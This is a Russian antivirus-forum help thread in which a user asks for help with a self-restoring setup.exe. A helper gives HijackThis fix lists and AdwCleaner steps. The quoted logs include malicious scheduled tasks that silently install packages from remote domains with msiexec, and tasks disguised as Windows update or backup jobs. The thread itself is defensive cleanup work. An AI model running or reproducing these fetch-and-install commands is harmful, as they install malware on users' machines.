Перейти к содержанию
Правила раздела

Постоянно создается файл setup в InstallShield

Logame

От Logame
в Помощь в удалении вирусов

 Share

Рекомендуемые сообщения

Logame Новичок

Logame

Опубликовано
Опубликовано

Доброй ночи,возникла проблема с вирусом setup.exe который блочит антивирусы и не даёт себя удалить,после удаления постоянно восстанавливается. Расположен в C:\Windows\SysWOW64\InstallShield\x32 изза него постоянно зависает Браузер. Помогите с проблемой!

Ссылка на комментарий
Поделиться на другие сайты
regist Корифей

regist

Опубликовано
Опубликовано

"Пофиксите" в HijackThis:

O1 - Hosts: is damaged (contains NUL characters only)
O4 - MSConfig\startupfolder: C:^Users^Logame^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Shortcut to Primary output from Start (Active).lnk [backup] => (lnk is corrupted) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: DAEMON Tools Pro Agent [command] = C:\Program Files\DAEMON Tools Pro\DTAgent.exe -autorun (HKCU) (2018/04/24) (file missing)
O4 - MSConfig\startupreg: Discord [command] = C:\Users\Logame\AppData\Local\Discord\app-0.0.300\Discord.exe (HKCU) (2018/04/14) (file missing)
O4 - MSConfig\startupreg: DriverPack Cloud [command] = C:\Program Files (x86)\DriverPack Cloud\DriverPackCloud.exe --run startup (HKLM) (2018/04/12) (file missing)
O4 - MSConfig\startupreg: Gaijin.Net Agent [command] = C:\Users\Logame\AppData\Local\Gaijin\Program Files (x86)\NetAgent\gjagent.exe (HKCU) (2019/01/09) (file missing)
O4 - MSConfig\startupreg: MegaFon_MegaFonInternet [command] = C:\Program Files (x86)\MegaFon\MegaFon Internet\MegaFonInternet.exe /minimized (HKLM) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: Roox_YotaAccess_Modems [command] = C:\Program Files (x86)\Yota\Yota Access (Modems)\YotaAccess.exe /minimized (HKLM) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: Scartel_YotaAccess_Modems [command] = C:\Program Files (x86)\Yota\Yota Access (Modems)\YotaAccess.exe /minimized (HKLM) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: YoutubeDownloader [command] = C:\Users\Logame\AppData\Roaming\YoutubeDownloader\python\pythonw.exe "start.pyc" ml3 (HKCU) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: YoutubeDownloader_upd [command] = C:\Users\Logame\AppData\Roaming\YoutubeDownloader_upd\python\pythonw.exe "start.pyc" ml3 (HKCU) (2019/01/21)
O4-32 - HKLM\..\Run: [Roox_YotaAccess_Modems] = C:\Program Files (x86)\Yota\Yota Access (Modems)\YotaAccess.exe /minimized (file missing)
O22 - Task: BlueStacksHelper - C:\Logame\Programm\Новая папка\BlueStacks\Client\Helper\BlueStacksHelper.exe (file missing)
O22 - Task: \Microsoft\Windows\Services\WindowsUpdate32 - C:\Windows\srv_ext.exe --run (file missing)
O22 - Task: \Microsoft\Windows\WindowsBackup\WindowsBackupTask - C:\Windows\winmain64.exe --run --sh (file missing)
O22 - Task: {5008EF5A-9901-78AF-86FF-C6A75151CCC4} - C:\Windows\system32\msiexec.exe /package https://refreshnerer711.info/5b8Y14adu7Z.s1L -q
O22 - Task: {B46739DC-95A0-0F69-3A7F-DE9C89BB2D6E} - C:\Windows\SysWOW64\loAN.exe /q -package https://refreshnerer711rb.info/vIQBca2OuvKV.0S4

 

 

сделайте свежие логи из обычного режима.


+

  • Скачайте AdwCleaner и сохраните его на Рабочем столе.
  • Запустите его через правую кн. мыши от имени администратора, нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
  • Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[s00].txt.
  • Прикрепите отчет к своему следующему сообщению.



 

Ссылка на комментарий
Поделиться на другие сайты
Logame Новичок

Logame

Опубликовано
  • Автор
Опубликовано

"Пофиксите" в HijackThis:

O1 - Hosts: is damaged (contains NUL characters only)
O4 - MSConfig\startupfolder: C:^Users^Logame^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Shortcut to Primary output from Start (Active).lnk [backup] => (lnk is corrupted) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: DAEMON Tools Pro Agent [command] = C:\Program Files\DAEMON Tools Pro\DTAgent.exe -autorun (HKCU) (2018/04/24) (file missing)
O4 - MSConfig\startupreg: Discord [command] = C:\Users\Logame\AppData\Local\Discord\app-0.0.300\Discord.exe (HKCU) (2018/04/14) (file missing)
O4 - MSConfig\startupreg: DriverPack Cloud [command] = C:\Program Files (x86)\DriverPack Cloud\DriverPackCloud.exe --run startup (HKLM) (2018/04/12) (file missing)
O4 - MSConfig\startupreg: Gaijin.Net Agent [command] = C:\Users\Logame\AppData\Local\Gaijin\Program Files (x86)\NetAgent\gjagent.exe (HKCU) (2019/01/09) (file missing)
O4 - MSConfig\startupreg: MegaFon_MegaFonInternet [command] = C:\Program Files (x86)\MegaFon\MegaFon Internet\MegaFonInternet.exe /minimized (HKLM) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: Roox_YotaAccess_Modems [command] = C:\Program Files (x86)\Yota\Yota Access (Modems)\YotaAccess.exe /minimized (HKLM) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: Scartel_YotaAccess_Modems [command] = C:\Program Files (x86)\Yota\Yota Access (Modems)\YotaAccess.exe /minimized (HKLM) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: YoutubeDownloader [command] = C:\Users\Logame\AppData\Roaming\YoutubeDownloader\python\pythonw.exe "start.pyc" ml3 (HKCU) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: YoutubeDownloader_upd [command] = C:\Users\Logame\AppData\Roaming\YoutubeDownloader_upd\python\pythonw.exe "start.pyc" ml3 (HKCU) (2019/01/21)
O4-32 - HKLM\..\Run: [Roox_YotaAccess_Modems] = C:\Program Files (x86)\Yota\Yota Access (Modems)\YotaAccess.exe /minimized (file missing)
O22 - Task: BlueStacksHelper - C:\Logame\Programm\Новая папка\BlueStacks\Client\Helper\BlueStacksHelper.exe (file missing)
O22 - Task: \Microsoft\Windows\Services\WindowsUpdate32 - C:\Windows\srv_ext.exe --run (file missing)
O22 - Task: \Microsoft\Windows\WindowsBackup\WindowsBackupTask - C:\Windows\winmain64.exe --run --sh (file missing)
O22 - Task: {5008EF5A-9901-78AF-86FF-C6A75151CCC4} - C:\Windows\system32\msiexec.exe /package https://refreshnerer711.info/5b8Y14adu7Z.s1L -q
O22 - Task: {B46739DC-95A0-0F69-3A7F-DE9C89BB2D6E} - C:\Windows\SysWOW64\loAN.exe /q -package https://refreshnerer711rb.info/vIQBca2OuvKV.0S4

сделайте свежие логи из обычного режима.

+

 

  • Скачайте AdwCleaner и сохраните его на Рабочем столе.
  • Запустите его через правую кн. мыши от имени администратора, нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
  • Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[s00].txt.
  • Прикрепите отчет к своему следующему сообщению.

 

 

 

CollectionLog-2019.02.03-20.45.zip

AdwCleanerS02.txt

Ссылка на комментарий
Поделиться на другие сайты
regist Корифей

regist

Опубликовано
Опубликовано (изменено)

1) Не надо заниматься оверковтингом.

2) деинсталируйте

HitmanPro 3.8 [20180513]-->"C:\Program Files\HitmanPro\HitmanPro.exe" /uninstall
3) Удалите остатки avast.

4) "Пофиксите" в HijackThis:

O4 - MSConfig\startupfolder: C:^Users^Logame^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Shortcut to Primary output from Start (Active).lnk [backup] => (lnk is corrupted) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: DAEMON Tools Pro Agent [command] = C:\Program Files\DAEMON Tools Pro\DTAgent.exe -autorun (HKCU) (2018/04/24) (file missing)
O4 - MSConfig\startupreg: MegaFon_MegaFonInternet [command] = C:\Program Files (x86)\MegaFon\MegaFon Internet\MegaFonInternet.exe /minimized (HKLM) (2019/01/21) (file missing)
O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
5) Проверьте этот файл на virustotal

C:\Windows\srv_ext.exe
кнопка Выбрать файл (Choose File) - ищете нужный файл у вас в системе - Открыть (Browse) - Проверить (Scan it!). Нажать на кнопку Повторить анализ (Reanalyse) если будет. Дождитесь результата . Ссылку на результат (то, что будет в адресной строке в браузере) копируете и выкладываете в теме.

 

6)

  • Запустите повторно AdwCleaner (by Malwarebytes) (программу необходимо запускать через правую кн. мыши от имени администратора).
  • В меню Настройки включите дополнительно в разделе Базовые действия:
    • Сбросить политики IE
    • Сбросить политики Chrome
  • В меню Панель управления нажмите Сканировать.
  • По окончании нажмите кнопку Очистить и восстановить и дождитесь окончания удаления.
  • Когда удаление будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt (где x - любая цифра).
  • Прикрепите отчет к своему следующему сообщению
Внимание: Для успешного удаления нужна перезагрузка компьютера!!!.

 

Подробнее читайте в этом руководстве.

Изменено пользователем Sandor
Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Share
Перейти к списку тем

  • Похожий контент

    • Ammorf
      Kaspersky Security Center: Не создается файл отчета в PDF
      От Ammorf
      OS - Windows Server 2012, установлены .NET Framework 3.5 и 4.8
      KSC - 14.2.0.26967

      При попытке выгрузки отчета в формате pdf возникает ошибка "Не удалось создать отчет. Unspecified error".
      Ошибка возникает только при попытке выгрузки на самом сервере, если делать через консоль на обычной win 10 машине - все ок.
      Однако из-за того, что он не может делать это на сервере - он так же не может их отправлять по почте или класть в папку в соответствии с расписанием. 
      В логах "Kaspersky Event log", "Kaspersky Security" и системных логах не создается ничего при воспроизведении такой ошибки.
      Правка реестра (HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage) со сменой локализации не помогает, к тому же изначально была установлена правильная  1251.
      .NET Framework 3.5 и 4.8 - установлен

    • Klomdeo
      Постоянно находит HEUR:Trojan.Multi.GenBadur.genw
      От Klomdeo
      Постоянно после перезагрузки компьютера находит эту программу. Раньше не обращал внимания, но вчера сам оп себе завершил работу компьютер. Уже второй день сношу эту программу через несколько этапов очистки Касперского, ничего не помогает. Из пиратского на компе была игра Content Warning, файлы которой я удалил в самом начале борьбы и OverWolf с Thunderstore mod manager для модов на игру Lethal Company. Помогите разобраться с данной проблемой, пожалуйста.

    • barank1n
      Не лечиться. Постоянно появляется снова "HEUR:Trojan.Multi.GenBadur.genw"
      От barank1n
      Висит примерно уже две недели. Руки дошли только сегодня. Установлен Kaspersky Anti-Virus. Kaspersky обнаруживает этот троян после каждого запуска ПК, даже после лечения.  Образ Windows не официальный. Прикрепляю к данной теме файл с логами.
      CollectionLog-2024.10.22-22.01.zip report1.log report2.log
    • Алексей maestroalexey
      [РЕШЕНО] Постоянно после перезагрузки компьютера находит HEUR:Trojan.Multi.GenBadur.genw
      От Алексей maestroalexey
      CollectionLog-2024.10.29-10.32.zip
    • Mrak
      Как с помощью Siri создать задачи в Google tasks
      От Mrak
      Всем привет!
       
      Подскажите пожалуйста, как с помощью Siri создать задачу в Google tasks?
       
      Мотивировка:
      Голосовой помощник идеально справляется с добавлением задач (напоминаний) во встроенные напоминания. Говоришь: привет сири, напомни мне завтра сходить за хлебом в 14 часов. Будет создано напоминание. Можно сказать "добавь в семейные напоминания на завтра сходить за хлебом". И он добавит в синхронизируемые общие напоминания семьи, чтобы кто-то сходил. В мире обеспеченных людей всё это должно работать идеально, ведь напоминания синхронизируются на всех устройствах эпл. Но на работе комп с виндой. Нет на нём эпловских напоминаний. Зато есть гугловый календарь и задачи. Они работают и на айфоне. И календарь идеально синхронизируется с айфоном (просто пользуешься учёткой гугла во встроенном календаре). Однако, с задачами так не выйдет. Ручками добавляются. Через гугл календарь добавляются. А голосом по любому быстрее. Прям намного. Раз этак в 10. Поэтому хочется научиться голосом на айфоне создавать задачи в гугл календаре. Если это технически возможно, конечно. Прошу помощи. 
       
×
×
  • Создать...